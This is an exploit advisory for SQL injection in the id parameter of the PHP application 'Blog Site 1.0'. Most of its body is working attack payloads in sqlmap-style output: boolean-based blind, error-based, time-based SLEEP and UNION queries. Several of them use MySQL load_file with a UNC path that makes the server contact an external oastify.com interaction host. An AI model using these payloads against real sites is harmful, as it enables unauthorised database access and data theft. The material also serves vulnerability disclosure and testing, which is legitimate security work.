Headline
Blog Site 1.0 SQL Injection
Blog Site version 1.0 suffers from a remote SQL injection vulnerability.
## Titles: blog-site-1.0 Multiple-SQLi## Author: nu11secur1ty## Date: 07/29/2024## Vendor: https://github.com/oretnom23## Software:https://www.sourcecodester.com/php/14442/blog-site-using-phpmysql.html## Reference: https://portswigger.net/web-security/sql-injection## Description:The id parameter appears to be vulnerable to SQL injection attacks. Thepayload '+(select load_file('\\\\turga9kvxwd8g46kuiim9id0srykmaa1dp4cv0k.oastify.com\\ywy'))+' was submittedin the id parameter. This payload injects a SQL sub-query that callsMySQL's load_file function with a UNC file path that references a URL on anexternal domain. The application interacted with that domain, indicatingthat the injected SQL query was executed.The attacker can get allinformation from the system by using this vulnerability!STATUS: HIGH- Vulnerability[+]Exploits:- SQLi Multiple:```mysql---Parameter: id (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: page=category&id=-7721' OR 5223=5223 AND 'yTLh'='yTLh Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUPBY clause (FLOOR) Payload: page=category&id=3'+(select load_file('\\\\turga9kvxwd8g46kuiim9id0srykmaa1dp4cv0k.oastify.com\\ywy'))+'' AND (SELECT2233 FROM(SELECT COUNT(*),CONCAT(0x7171717671,(SELECT(ELT(2233=2233,1))),0x716b626a71,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Mgsn'='Mgsn Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: page=category&id=3'+(select load_file('\\\\turga9kvxwd8g46kuiim9id0srykmaa1dp4cv0k.oastify.com\\ywy'))+'' AND (SELECT5859 FROM (SELECT(SLEEP(7)))tvNV) AND 'ocCx'='ocCx Type: UNION query Title: MySQL UNION query (NULL) - 9 columns Payload: page=category&id=3'+(select load_file('\\\\turga9kvxwd8g46kuiim9id0srykmaa1dp4cv0k.oastify.com\\ywy'))+'' UNION ALLSELECTCONCAT(0x7171717671,0x416d7442627944704b55554267774f596d766967615341654a4242745a45467a71494f73596f776b,0x716b626a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#---```## Reproduce:[href](https://www.patreon.com/posts/blog-site-1-0-108994688)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/07/blog-site-10-multiple-sqli.html)## Time spent:00:37:00